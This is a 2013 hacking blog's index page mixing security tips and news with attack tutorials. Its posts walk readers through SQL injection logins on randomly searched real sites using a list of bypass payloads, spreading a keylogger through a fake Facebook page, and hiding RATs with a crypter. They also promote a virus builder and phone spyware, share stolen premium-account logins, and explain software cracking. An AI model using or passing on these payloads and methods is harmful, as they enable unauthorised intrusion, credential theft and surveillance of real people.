Now you all can invite me on skype for any kind of help required as my username is krackoworld

25 December 2013

How to Boost IDM download Speed Upto Maximum?

idm-optimizer-maximum-speed-tutorial Are you fed up with slow speeds and Internet Download Manager (IDM) wont give you the proper downloading speeds, looking to optimize your speeds for better downloading then this article is for you. All of us knows that IDM is the best software to download things at faster way but it can also be optimized further with some settings. Therefore today I am going to tell you How top Boost IDM downloading speeds up to maximum and open all the ports of it etc. Note- I have mentioned two methods below, so pick up one to give a try and test!

How to Increase Downloading Speed of IDM Manually?

Step 1- Firstly of Open your IDM Tray icon in the bottom right.

Step 2- Then go to Downloads > Options.

Step 3- Now select the Connection option from the options and make the changes given below-

  • Change Connection Speed to “LAN 10Mbs”.
  • Be sure that BPS Field number has changed to 10000000 after changing connection Speed.
  • Then Change Maximum Connection Numbers to 16.

Now Save these settings by clicking the OK button. After saving these settings you will observe that your downloading speed is increased now. Enjoy!

I am damn sure from now, you will see the change in IDM Speed i.e doubled.

How to boost IDM speed with IDM Optimizer?

  • Firstly Download IDM Optimizer from Here.
  • Once it opened, you will see the following screen display :-
  • Now just hit the ” maximize now ” button and you are all done.
  • Now just restart your computer and see the difference in download speed.

That’s it! Have a nice day.

03 December 2013

Top 5 Must Have Iphone Security Applications 2014

top 5 iphone security apps Well after a very very long time, today I am here to introduce you some top 5 must have Iphone Apps of 2013-2014 etc. Sometimes we forget about our iPhones when it comes to security issue, but hackers, crackers and other bad guys don't forget this. As this result, criminals would love to get their hands in your iPhone with latest IOS release. Therefore these great security related iPhone apps helps you protect your iPhone, it's data, and even your home as well. Check it out now!

Top 5 Must Have iPhone Security Apps 2014:-

1. Find My iPhone

Here's a free way to find your lost iPhone, using another iOS device! Simply download this onto your iPad, iPod Touch or Mac, open it and log in with your Apple email ID. Find My iPhone will help you locate your missing device on a map, display a message, play a sound, remotely lock your iPhone or erase all your iPhone's data easily.


This app costs 9.99$ from the apple app store. This app has 256 bit blowfish encryption, auto-lock, password generator, cloud data protection, free backup utility, email attachment backup/restore, and optional self-destruct.


The alarm system monitor and control application will let you arm, disarm, check the system's status and other tasks depending on what features you subscribe to. I just love this alarm.

4. Kryptos (for Secure VoIP calls)

Its free man! Kryptos is a Voice Over IP (VoIP) app for the iPhone that is intended to provide military-grade AES-encrypted phone calls (provided each party is using the Kryptos application to make and receive calls)

5. Pocket Cloud

Wow! This is the most expensive app on the list worth $14.99; however, it promises a secure and fast way to remotely connect, access files, pictures and applications with a simple installation, security and RDP/VNC compatibility etc.

All Done! Enjoy and Please share…

17 November 2013

Top 20 Best Hacking Forums of 2013-14

hacking forums If you are looking for some top best hacking forums of 2013 and 2014, then you are at very right place as today I am going to share the list of them. There are some hacking forums which are underground and only open for some users so I had some list of all underground hacking forums below. So get their question answer at there and also Please comment below if I missed anyone. Have a look!

Here is the list of Top 20 Best hacking Forums:

1. Hack Forums

2. Hack Hound

3. InterN0T - Underground Security Training

4. Hack-Tech • Security Forums


6. SQL Injection | Coded by 4ur3x

7. Binary Revolution Forums

8. Hack This Site!

9. - Trojan programming forum -

10. - Simply the best hacking board - Index page`

11. CyberTerrorists - The War On Cyber • Index page

12. r00tsecurity - your network for security and technology


14. Forums - Powered by vBulletin

15. WL-Group (Powered by Invision Power Board)

16. SSTeam - Security Scene Team

17. Forums (Powered by Invision Power Board)

18. Blackhat Forums - Underground Hacking and Security Community

19. Anonymous Hacking Forum

20. VIP Hack Forums

That’s it! Enjoy and Keep Posting there…

05 November 2013

How to Create your Own Virus Using Ultimate Virus Builder

create your own virus Hey What’s up today? I am again back with a bang article on Creating your own virus in seconds with the only software named as Ultimate Virus Builder 2013. Ultimate Virus Builder software offers you more than 50 options to customize your own maked virus. In this software you can set any icon for your virus ! Not only does this tool allow you to create own customize viruses, it can also help you spoof the extension of any file with the built in extension spoofer etc. But make sure that you don't make it run on your own pc as it can destroy it very badly! So lets look more on its features below-

Features of Ultimate Virus Builder

Download Ultimate Virus Builder

  • Add to startup
  • Disable System Repair
  • Disable Msconfig
  • Disable Explorer
  • Disable Regedit
  • Disable clipboard
  • Disable task manager
  • Disable CMD
  • Hide taskbar
  • Disconnect from the internet
  • Switch mouse buttons
  • Many more etc!


Download Ultimate Virus Builder


I hope you all will enjoy this tool and use it with your own risks. Note- I can’t help you if you have done any damage by this tool and inject the virus in your own computer. Have a nice day…Happy Diwali!

26 October 2013

Hacker stole $100K from Users of California using SQL Injection Method

After a long time since my B.Tech Exams are over, Today I am going to write on a latest news that is how Hackers stole 100,000 $ from California users Based ISP using SQL injection. Now a days SQL injection being an easy and weakness on the web against Hacking! In 2013 we have seen a impressive improve in the variety of crack strikes tried against financial institutions, lending institutions and power organizations using various methods such as DDoS attack, DNS Hijacking, SQL injects and Zero-Day exploits as well. So lets know this one story below-

14 October 2013

How to Block Facebook on your PC?

blocking-facebook At KrackoWorld, I have posted many articles on Facebook Hacking but this time its all about Blocking Facebook on your Computer for various purposes. Also I have written post on blocking and unblocking websites previously. This might be helpful if you want to prevent/save students from using facebook in school and colleges or your employees in office as well. Parents can also use this trick to prevent their Childs from using Facebook. So lets learn this trick below.

How to Block Facebook on your Computer- Steps:

1. Go to Start > Programmes > Accessories
2. Then Right click on Notepad and Run it as administrator.
3. Now open host file by clicking on File > Open and locate to following address


4. Then just below # localhost, paste the following code
# Blocking Facebook

5. Now save the host file and all done.
6. Open any browser and try to open facebook. It won't open. If facebook opens then you might have done something wrong. That’s it!

Any Doubts:

If you face any difficulty blocking facebook on your PC then please leave a comment below, I will be glad to help you out ASAP. Enjoy…

Must Read- How to Hack Facebook Accounts - All Possible Ways

30 September 2013

Tips To Keep In Mind If You Are Using Your Password on Others Pc

computer password safe The internet has become a very integral part of our lives. With it you can transact business, communicate with families and friends, you can do your research and studies: it has essentially become a very important part of our lives. To use these internet resources, we need to open user accounts/profile which we can only access using passwords.

However, there are other internet users whose main intentions are to cause harm, spread viruses, and steal private information to use for harm or a number of various reasons. Such users may be referred to as hackers, profile impersonators and many other names. As an experienced and informed computer and internet user, you may have taken precautions against such malicious intentions, but it is not always you will access your online emails, profiles, Web pages or any other resources you need the internet for. In the event you gain access through other people’s computers or public computers then you need to take precautions to protect your password.

How to Protect your Password on a Shared Computer

The following are some of the steps you need to take while using shared computer to access your online and sensitive information.

  • Ensure that the browser is not set to remember your username and password automatically. This will enable subsequent access to your account even after you have logged out after using it. Most browsers come with the feature of allowing you to fast access your account by automatically filling in your username and password on the subsequent logging in after the first time. Ensure your initial logging into your account using a computer which is not yours, that you do not instruct the browser to automatically remember password.
  • Always ensure that you click log out once you are done with your online user account. Closing the browser window or typing in a new URL in the browser will not necessarily log you out of your account. Most social media and email account have automatic login capability, thus the next computer user will easily access your account if you did not logout.
  • Check whether the computer you are using has anti-spy software, and if it does, ensure that it is updated to the latest version or at least a version that is quite previous. This is because the computer you are using may be having a spyware installed, with or without the owner's knowledge. If you must access you online information using a computer that is not yours, ensure that at least it has a reputable anti-spy software running.
  • It also helps to erase your tracks once you are done using the computer. There are a number of ways of doing this, the simple one is by browsing with privacy settings on. This will enable the browser and the computer not to keep history and cookies information about your activities online. Another method is by clearing recent browser history and cookies on your own. You go to the browser setting and click on delete browser history, and thus delete all the history that pertains to the activities you were doing online.
  • Never save information about your password on somebody’s computer. Some users have difficulty keeping their password in their head, thus prefer writing it down especially on Window’s tools such as Sticky Notes, Notepads and WordPad’s. Especially when they are creating a new account/profile in a new platform and it so happens they create such account/profiles on somebody’s computer. Writing down and saving your password on somebody’s computer is highly insecure since the owner may come across it after you are done and thus easily access your information.

These are some of the measures you should take to ensure nobody get knowledge of your password information. The key measure is to use your prudence such as don’t disclose your password to anybody else, when typing your password ensure nobody is looking at the keyboard or is behind you. For further assistance on password protection, you may contact Technology Helpdesk by calling one of their tech support numbers.

26 September 2013

Download Premium Accounts Username Password Cookies for Free

free premium accounts Hello Friends, after long time again back with a bang article on free Download Premium Accounts Username Password Cookies of 19-Sept-2013. Hence today I am going to share premium users accounts username password and cookies of many file sharing websites like rapidshare, hotfile, megaupload, filefactory and many more. So just enjoy high speeds, no advertisements, pause resume and much more advanced features on premium accounts. Have a look and download the file now!

Free Premium Accounts Username Password Cookies | Bypass Survey and Free Premium Link Generator

  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • uploading Premium Account 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Unibytes Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Ryushare Premium Cookie 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Filefactory Premium Account 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Account 19-Sept-19013
  • Ryushare Premium Cookie  19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Firstload Premium Account 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Account 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Filesonic Premium Account 19-Sept-19013
  • Premium Account 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Account 19-Sept-19013
  • Filesonic Premium Account 19-Sept-19013
  • HuluPlus Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • FilesMonster Premium Account19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Filefactory Premium Account 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Account 19-Sept-19013
  • Firstload Premium Account 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Account 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Filefactory Premium Account 19-Sept-19013
  • Premium Account19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Unibytes Premium Account 19-Sept-19013
  • HuluPlus Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Account
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • FilesMonster Premium Account 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • Premium Accounts 19-Sept-19013
  • uploading Premium Account 19-Sept-19013

    Download File Now

    That’s it! Till then Bye…

  • 15 September 2013

    How to Hack Mobile Phones via mSpy keylogger

    mspy keylogger If you are in the search for best and ideal Mobile Phone Keylogger then you are at very right place as today I am going to introduce you a great remote keylogger with advanced features named as mSpy Keylogger. Now live without No more worries and no more uncertainty. mSpy is compatible with jail-broken iPhones, Android, Symbian and BlackBerry operating systems as well. Now mSpy does everything from collecting data on calls, SMS/MMS and emails to track the live physical location of the  cell phone using GPS System. Here is all the key features and How to Use it!

    mSpy Key Features

    • Spy Call
    • Read SMS Text
    • Call History
    • Call Recordings
    • Email Logging
    • Messenger Logging
    • Location Tracking
    • Address Book
    • Email Relay
    • Photos
    • Videos
    • Unlimited Device Change
    • Upgrades
    • Unique Features
    • Call History
    • Skype

    Click here to Download mSpy.

    That’s it! Enjoy Hacking…

    20 August 2013

    Basic SQL Injection with List of all Possible Passwords

    sql_img Hi! After long time break, today I came up with an simple tutorial on Basic SQL Injection in which we are trying to gain admin access by hit and trial method- All Possible SQL Injections! Previously I had also written an beautiful post on How to Hack Websites Using Havij. Well A SQL injection injects a code into the MYSQL database which gets passed the site security login. So after getting so much response, I decided to wrote this article and even a child can perform this method. In this, we will take help of Google Search Engine and then find admin login URL’s and lastly inject SQL passwords. That’s it! Please have a look.

    Hack Website Admin Account: Basic SQL Injection Attack

    1. First of all Google admin/login.asp and do a complete search.

    sql injection 2. Now you can see in the above picture, we are looking for the websites that look like this and ends with admin/login.asp

    3. Click on any of the websites as you founded above and login with this-

    Username : admin

    Password : 1'or'1'='1

    4. Well done!! Your now logged in as ADMIN Successfully. Hence do what you want.

    5. If Password is not working then please try the following-

    List of injections:

           ' or 0=0 --
           " or 0=0 --
           or 0=0 --
           ' or 0=0 #
           " or 0=0 #
           or 0=0 #
           ' or 'x'='x
           " or "x"="x
           ') or ('x'='x
           ' or 1=1--
           " or 1=1--
           or 1=1--
           ' or a=a--
           " or "a"="a
           ') or ('a'='a
           ") or ("a"="a
           hi" or "a"="a
           hi" or 1=1 --
           hi' or 1=1 --
           hi' or 'a'='a
           hi') or ('a'='a
           hi") or ("a"="a

    Note- If any website has applied login limits, then this method might gets failed.

    All Done! Enjoy Hacking and Must Share!

    11 August 2013

    Download FUD Crypter 2013 Free- Bypass Antivirus Detection

    Here at KrackoWorld, I have written many articles on FUD Keyloggers, Crypters, Stealers etc and now its time to share some great FUD Crypter of 2013 absolutely free! With this, you can easily gain remote access to victim’s PC and know all his/her activities. But such hacking tools can be easily detected by victims antiviruses. So we have the solution as Crypter which can be used to hide our viruses, RATs or any keylogger from antiviruses. Well now a days its being the best and popular method of email account hacking. So lets start with it!

    FUD Crypter 2013 Free Download - Bypass Antivirus Detection

    fud crypter 2013

    Click here to download it!


    • FUD 0/37 Crypter
    • FUD 0/37 Binder
    • Extension Spoofer
    • Icon Changer
    • More to come

    Also SEE- Download Sniperspy- Best Hacking Software Ever!

    That’s it! Enjoy FUD Crypter to bypass antivirus detection...and must share this!

    31 July 2013

    How to Bypass Mobile Phone Number Verification

    bypass mobile number verification Are you Looking for Mobile Phone Number Verification to save your own personal information to be leaked out? If yes, then post is all yours! Now a days its being the main criteria of popular websites like Gmail, Facebook and many more to get yourself verified via Mobile Number Code Sent, hence to avoid it there are so many sites exits which can create your secret mobile number online and access to your inbox etc. There today I am going to mention that sites to bypass mobile phone number verification easily by making a free account on them. Have a look!

    Some Benefits of these Sites to Bypass Mobile Number:

    1. Bypass Gmail Mob. Number Verification

    2. Bypass Facebook Mob. Number Verification

    3. Bypass YouTube Mobile Number Verification

    4. Bypass Skype Verification

    5. Bypass Ymail, Rediff, Elance and many more

    Top Sites to Bypass Mobile Number Verification are-

    1. Pinger

    2. Receive SMS Online

    3. Lleida Free SMS

    4. Sellaite SMS Receiver

    That's it! Enjoy…

    21 July 2013

    Ubuntu Forums Hacked: 2 Million User's Account Exposed

    ubuntu forums hacked Recently was badly hacked and around 2 million users that it has suffered a serious security breach. They have posted a message on its index page, informing its near 2 million users information being leaked! The website was defaced by hacker with Twitter handle “Sputn1k_” and Unfortunately the attacker have gotten every user's local username, encrypted password, and email address from the Ubuntu Forums database. Lots of people are complaining about this.

    Security breach at Ubuntu Forums compromised

    Canonical advises users who have used their same forum password on other sites to change it immediately. "Ubuntu One,  Launchpad and other Ubuntu/Canonical services are not affected by the breach," as company stated.

    Update: Well the Canonical IS team is working hard to restore the normal operations and get everything back as previous.

    Also See- Yahoo Voices Hacked! Around 450K Account Passwords Leaked

    11 July 2013

    Install Keylogger via Online URL to Hack Facebook Accounts

    hack facebook via keylogger installed online At krackoworld, we are always looking for a new hack to get access to online accounts without worry. We covered articles related to Facebook, Gmail and Twitter password Hacking etc. But today I am going to tell you a new way on How to Hack Facebook Accounts via installing a remote FUD keylogger into a url and when your victim’s open it….he/she got hacked as keylogger gets inside in its PC to tell us all information or Keystrokes pushed. Note- In this trick first you need to create keylogger file and have to share it on facebook profile, when someone click on that link and install that application (keylogger), Keylogger will start monitoring and will send all capture details on your email ID. So without wasting much more time, lets get to the tutorial below.

    How to Hack Facebook Password using online Keylogger via Web URL?

    Step 1: First of all Download Fake Facebook Index and FUD Keylogger (Sniperspy Keylogger)

    Step 2: Now make FUD Keylog file using your keylogger and upload it on your Webhost etc.

    Note - If you are using free keylogger and your keylogger is not FUD, then make sure to read my this article on How to Make Remote Keylogger Undetectable from Antivirus with FUD Crypter

    Step 3: Now Edit index.html and find -> and replace with your keylogger link which you have uploaded on your webhost.

    Step 4: Now upload Index.html to your webhost and share the link of Index.html file on facebook.

    That’s it...

    I hope you will like this new trick about facebook password hacking and If you have any problem in hacking Facebook password , feel free to mention it below at comments section. Enjoy!

    03 July 2013

    Hacking Facebook Account Password with a Text SMS

    hacking facebook with single sms Time and Time ago, New Facebook Hacking tricks are releasing out but today KrackoWorld brings you a tutorial that How to Hack Facebook Password with just a simple text message. Note- This method does not requires any other malicious stuff like Trojans, phishing, keylogger etc. Facebook Hacking is not as easy thing but logical and can be done with a bug. Therefore today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing 1 SMS. Have a look!

    22 June 2013

    Latest 3G Reliance Hack Trick 2013

    I am back with a new latest hack trick for Reliance users. Today in this article I am going to mention some Latest Reliance 3G Hack Trick 2013. In this article I am going to mention some setting which you have to follow for surfing free internet at high speed. This 3G Reliance Hack Trick works in almost all the regions of India. The trick which is given below is recommended by many people of India. I can say that this trick will work in 90% of regions of India but there are still 10% of chance not working in all regions. But must try it. If this trick works in your region, you are so lucky because this hack trick provides you very high speed. Here's the Latest 3G Reliance Hack Trick 2013.

    15 June 2013

    Latest BSNL 3G/2G Hack Trick 2013

    As you all know that we always comes with the great hack tricks today also I am going to write Latest BSNL 3G/2G Hack Trick 2013. This really makes yo able to surf free BSNL internet for free. This trick works both on your computers and mobiles. In this article I am going to mention some settings which you have to do in your phone or computer to experience this amazing BSNL 3G/2G Hack Trick 2013. This BSNL Hack Trick is used by many people and some of these people are my friends. You can also download unlimited things using this trick. So get ready to surf free BSNL internet for free with very high speed.

    How to Hack iPhone iOS 7 to Bypass Lock Screen

    Hacking iPhone to bypass iOS 7 Lock Screen With the release of new iOS 7 there are lots of bugs and things which still need to be fixed by apple but in between Forbes has discovered some new hack/way of bypassing Lock Screen in iPhone iOS7. The all-new Apple iOS 7 launched at WWCD 2013 this week and Just after 48 hours of iOS 7 release, Jose Rodriguez iPhone user able to hack and bypass Lockscreen to access the Photos in just a few seconds. Well this is a great security problem of Apple iPhone.

    Therefore Forbes points us to a new video showing how to completely bypass the iPhone’s password protection by accessing the calculator application available at the lock screen etc.

    In Short,

    "By opening iOS’s Control Room and accessing the phone’s calculator application before opening the phone’s camera, anyone can access, delete, email, upload or tweet the device’s photos without knowing its passcode."

    So my suggestion is that to not to use Apple iPhone iOS7 for now as it is totally buggy…Apple says that the beta version should be removed completely in the September 2013. Till then Peace!!!

    Also SEE- How to Unlock New iPhone 5 with AT&T Easily

    06 June 2013

    How to Hack and Crack IDM Manually in 2013

    crack idm manually Hacking or Cracking internet download manager (IDM) is not as easy but logical. We use many tools online like patch generator in order to make it full version or demo free. IDM as you all knows one of the fastest and best downloading software ever on internet and its cracked or patched versions contains viruses. That’s why Today I am back with a bang post on this and by using this hack you can register the Internet Download Manager for free using your own credentials i.e registration on your Name and email ID. Lets know it below.

    Learn How to Crack IDM manually?

    Step 1: First of all Download the IDM trial or If you already have IDM installed Update it by going to Help---}} then to check for Updates.

    Step 2: Now Go to START => Then go to RUN and type the following text and click enter:

    notepad %windir%\system32\drivers\etc\hosts

    Step 3: Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below you will see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on apply and then click on Ok, now you will be able to edit the hosts file and save changes in it.

    Detail Note about Granting Permission In Windows 7:

    For Windows 7 users, due to security reasons you will not be able to save hosts follow this steps :

    First of all go to C:/ drive then go to Windows Folder and then go to System32 folder and then go to Drivers folder and then go to Etc Folder, in the Etc folder you will see the hosts file.

    Now right click on hosts file and go to its properties then go to Security tab select Users under Group or user names and click on edit button,Permission For Host Window will get open, in that window select Users account and grant permission in bellow section which is "Permission for SYSTEM" by clicking all checkbox under "Allow" Name and press Ok. Dont click on any Deny check box.

    Note : If  you have login through admin then skip this step6 .Its just for granting permission for editing file.

    Step 4: Thus a notepad file appears something like this as shown below:

    crack IDM

    Now copy the below lines of code and add to hosts file as shown above image box :

    After adding these piece of code, save the notepad file. And exit from there.

    Step 5: Now open IDM and click on Registration. When you click on registration, Now a new dialog(window) appears that is asking for Name, Last Name, Email Address and Serial Key.

    Step 6: Hence Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:


    And click on ok to register.

    Step 7: After you click ok, it will show an message that you have registered IDM successfully.
    Now start your Internet download manager, and now you IDM has been converted to full version and specially when you update next time, your registration will not expire.
    That means it will remain full version for life time and you can update it without any problem in future. That’s it!

    Your Job gets done and any comments are welcomed below for this article. Enjoy…

    30 May 2013

    How to Hack PayPal Accounts to Steal User Private Info

    paypal PayPal as you all knows one of the leading companies in today’s online transaction. Recently Nir Goldshlager, founder of Breaksec and Security Researcher reported critical flaws in Paypal Reporting system that allowed him to steal private data of any PayPal account. Exploiting the vulnerabilities he discovered, allowed him to access the financial information of any PayPal user including victim's shipping address, Email addresses, Phone Number, Item name, Item Amount, Full name, Transaction/Invoice ID,  Transaction, Subject, Account ID, Paypal Reference ID and many more.

    He found that PayPal is actually using the Actuate Iportal Application (a third party app) to display customer reports, so Nir downloaded the trial version of this app for testing purpose from its official website.

    After going deeply through the source code of trial version, Nir located a file named that allowed him to access user's data without credentials. For more information see the pictures below-

    Critical Vulnerability allowed hacker to spy on PayPal accounts

    Update- PayPal Security Team has fixed this bug now! Thanks…

    Also read- How Hackers can Make Money with PayPal Bug Bounty Programs?

    25 May 2013

    What is Zero Day Attack or Exploit?- Know its Prevention

    zero day attack A zero-day (or zero-hour or day zero) attack is an attack that exploits a previously unknown vulnerability in a computer application, i.e the attack occurs on "day zero" of awareness of the vulnerability. This means that the developers have had zero days to address and patch the vulnerability. Zero-day exploits (actual software that uses a security hole to carry out an attack) are used or shared by attackers before the developer of the target software knows about the vulnerability etc.

    Ordinarily, when someone detects that a software program contains a potential security issue, that person or company will notify the software company (and sometimes the world at large) so that action can be taken. Given time, the software company can fix the code and distribute a patch or software update. Even if potential attackers hear about the vulnerability, it may take them some time to exploit it; meanwhile, the fix will hopefully become available first.

    Sometimes, a hacker may be the first to discover the vulnerability. Since the vulnerability isn't known in advance, there is no way to guard against the exploit before it happens. Companies exposed to such exploits can, however, institute procedures for early detection:

    • Use virtual LANs (IPsec) to protect the contents of individual transmissions.
    • Deploy an intrusion detection system (firewall).
    • Introduce network access control to prevent rogue machines from gaining access to the wire.
    • Lock down wireless access points and use a security scheme like Wi-Fi Protected Accessor WPA2 for maximum protection against wireless-based attacks.

    Zero Day Attack Prevention tips:

    1. "Multiple layers" provides service-agnostic protection and is the first line of defense should an exploit in any one layer be discovered. An example of this for a particular service is implementing access control lists in the service itself, restricting network access to it via local server firewalling (i.e., IP tables), and then protecting the entire network with a hardware firewall. All three layers provide redundant protection in case a compromise in any one of them occurs.

    2. The use of port knocking or single packet authorization daemons may provide effective protection against zero-day exploits in network services. However these techniques are not suitable for environments with a large number of users.

    3. Whitelisting effectively protects against zero day threats. Whitelisting will only allow known good applications to access a system and so any new or unknown exploits are not allowed access. Although whitelisting is effective against zero-day attacks, an application "known" to be good can in fact have vulnerabilities that were missed in testing. To bolster its protection capability, it is often combined with other methods of protection such as host-based intrusion-prevention system or a blacklist of virus definitions, and it can sometimes be quite restrictive to the user.

    4. Engineers and vendors such as Gama-Sec in Israel and DataClone Labs in Reno, Nevada are attempting to provide support with the Zeroday Project, which purports to provide information on upcoming attacks and provide support to vulnerable systems.

    5. Keeping the computer’s software up-to-date is very important as well and it does help.

    6. Users need to be careful when clicking on links or opening email attachments with images or PDF files, even if the sender is someone they know. This is how many cyber criminals deceive users, by pretending they are something they are not and gaining the user’s trust, as well as having a virus or other malware email copies of itself to the address lists of infected victims.

    7. Utilize sites with Secure Socket Layer (SSL), which secures the information being passed between the user and the visited site.

    That’s it!

    09 May 2013

    5 Tips to Prevent Online Account Hacking-Taking Hacking Efforts to the Base of Humiliation

    online account hacking Hacking

    Basically, with the changing face of technology, many online resources are increasingly falling victim due to many hacking due to attempts. Indeed, due to the failure of many online enterprises as well as persons to have a stable, highly integrative security systems on their accounts, hackers are taking advantage of weak access points leaving destruction beyond imaginations. But can that be curbed? A question is rattled by many. Well, with a particular focus on many online niches, certain efforts have proven worthwhile in preventing online account hacking. Let's take a look.

    Preventing Hacking on Online Accounts

    The first step of preventing hacking on online accounts is to keep vigil on the running accounts on your computing systems. This tip has seen many online accounts emerging as strong programs to bring rapid time to value in efforts to curb online accounts. This is because every single program in the internet launches a process that displays any information together with account access points in the windows task manager. Therefore, keeping vigil of the running processes can help identify any hacking attempts as well as increase operational performance to security systems.

    Computer protection through strong and impermeable security software might prevent advanced hackers from cracking into platforms with sensitive data and online accounts. An antimalware application as well as an antivirus (the latest version) provide a standardized, industry-leading practice delivery security mechanism that enables your account to offer fixed-scope security capabilities hence preventing any hacking practices. For instance, the child tax credit helpline has redefined value for customers as well as preventing hacking by having a strong bond of security system through malware applications and related security software.

    As if this is not enough, the use of strong passwords that are well equipped by physical personal identifiers like voice and fingerprint identifier metrics has also shown continued ability to prevent spammer hacking efforts. In fact, such metrics strengthen the passwords hence preventing other computer crimes like cracking, industrial espionage, piracy and even fraud. Although strong passwords offer one of the best approaches in preventing hacking, it is true that serious and competent hackers will still find way to online accounts by using the key logger application. Therefore, weakening key logs by making use of unique passwords made up of a combination of letters, symbols, and numbers will be a technological initiative that will have an immediate impact on hacking.

    Unprotected public networks, which have become the order of the day in the provision of free Wi-Fi and other web access protocols, are threat to online accounts. Through the special software, a hacker sitting in the same cyber café with you can gain access to all your password at a time when you are trying to access certain accounts. But how is it possible? Well, public networks are unprotected and attract a lot of people which make them prone to hacking therefore should never be used for online shopping, banking or even in many email forms.

    Finally, it is no secret that many hackers are advancing towards freeware which occurs in many forms of downloads. This means that free downloads and other no-fee applications are being used by hackers to gain an internal metric in many accounts, both enterprise based and personal. Therefore, minimizing interactions with free downloads and applications will reduce the level of risk posed by online account hackers. With all these approaches, you can now redefine and expand your online account security by enabling industry-focused solutions to cut short and handicap any hacking efforts.

    05 May 2013

    Tips to Improve the security of your WordPress Blog and Make Bullet Proof

    wordpress security tips Well Security is not really a massive issue until your blog starts becoming popular. If you start receiving a decent amount of traffic, your blog will become the target of online malcontents. Traffic may be turned into cash online via a large number of various (and sometimes nefarious) routes. It is good practice to start as you mean to go on and introduce blog security from the outset. Here are some tips that anyone can use, even if you are not technically/programmatically trained.

    30 April 2013

    How to Make Money with Google Chromium Bounty Programs

    Google bug bounty for Chrome bugs Now a days its becoming trend to pay to those smart hackers who can find and fix vulnerability in their systems. Recently Google has also opened that type of program in which they already paid around $300,000 etc. Therefore, every person will get the bounty of $500 for each vulnerability they report in the Chrome browser and its underlying open-source code. This is known as Chromium Vulnerability Rewards Program.

    The Purpose of The Program

    This Vulnerability Rewards Program was created to help reward the contributions of security researchers who invest their time & effort in helping us to make Chromium more secure. Through this program we provide monetary awards and public recognition for vulnerabilities responsibly disclosed to the Chromium project and many more.

    Some FAQ’s

    What reward might I get?

    Our base reward for eligible bugs is $500, but the typical payout is usually at least $1000. If the rewards panel finds the bug particularly severe, the value can be as much as $3133.70. Or if the rewards panel finds a report really impressive, the value can be as much as $10,000 or even beyond. To ensure the greatest chance at the maximum possible award please adhere to the guidelines provided in the Reporting Security Bugs.

    What bugs are eligible?

    Any security bug may be considered. We will typically focus on High and Critical impact bugs, but any clever vulnerability at any severity might get a reward. Obviously, your bug won't be eligible if you worked on the code or review in the area in question.

    Who pays for the awards program?

    As a consumer of the Chromium open source project, Google sponsors the rewards.

